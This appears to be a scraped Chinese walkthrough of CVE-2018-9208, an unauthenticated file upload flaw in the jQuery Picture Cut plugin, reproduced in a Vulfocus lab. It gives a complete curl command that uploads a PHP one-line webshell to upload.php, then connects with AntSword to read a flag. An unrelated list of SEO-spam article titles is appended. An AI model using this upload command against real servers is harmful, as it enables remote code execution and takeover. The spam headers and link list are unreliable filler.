当前位置: 首页 > news >正文

上海公司注册一网通办郴州seo快速排名

上海公司注册一网通办,郴州seo快速排名,多终端响应式网站,安徽合肥网络营销哪家好jquery-picture-cut 任意文件上传_(CVE-2018-9208) 漏洞信息 jQuery Picture Cut v1.1以下版本中存在安全漏洞CVE-2018-9208文件上传漏洞 描述 ​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap…

jquery-picture-cut 任意文件上传_(CVE-2018-9208)

漏洞信息

  • jQuery Picture Cut v1.1以下版本中存在安全漏洞
  • CVE-2018-9208
  • 文件上传漏洞

描述

​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

访问首页

image-20231027115056615

使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置

jquery-picture-cut/src/php/upload.php
curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@yijuhua.php" http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php

image-20231027115508665

使用中国蚁剑连接

http://10.9.47.6:56174/yijuhua.php

image-20231027115602804

获取flag

image-20231027115638391

http://www.tj-hxxt.cn/news/29541.html

相关文章:

  • wifi和卫星有关系吗合肥seo管理
  • 可以接单做网站的软件seo优化服务价格
  • 模仿网站怎么做如何推广品牌知名度
  • 凡科做网站行吗推广代理登录页面
  • html5高端红色织梦网络公司网站站长工具ip查询
  • 郑州模板网站建设策划公司海外推广平台有哪些?
  • 手机网站开发在pc端营销网络的建设怎么写
  • 哪个网站百度收录快北京seo推广系统
  • 网站官网认证加v怎么做数字营销网站
  • 黑龙江网站建站建设靠谱的代运营公司
  • 建设网站证书不受信任网站关键字优化价格
  • 兰溪高端网站建设公司申请自媒体平台注册
  • 帝国cms怎么做网站地图输入关键词自动生成文章
  • 白银做网站的董事千峰培训出来好就业吗
  • 网站参数错误怎么解决方法平台seo
  • 59网站一起做网店广州chrome浏览器
  • 彩票网站开发 晓风推广平台都有哪些
  • 电子商务网站建设过程范文手机app免费下载
  • b2b网站怎么建设视频推广渠道有哪些
  • 建设大厦网站想要网站推广页
  • 网站制作客户寻找百度官方优化指南
  • 安徽合肥做网站今日新闻网
  • 织梦通用seo网站模板seo关键词如何设置
  • 中山住房和建设局工程交易网站青岛网络优化费用
  • 长沙关键词优化费用泉州seo按天收费
  • 做微商选择的哪个平台微平台网站百度指数官方下载
  • 腾讯云wordpress帐号seo推广是什么意思呢
  • 类似红盟的网站怎么做手机百度电脑版入口
  • 外贸销售网站建设网页搜索引擎
  • 大型门户网站开发费用如何在百度打广告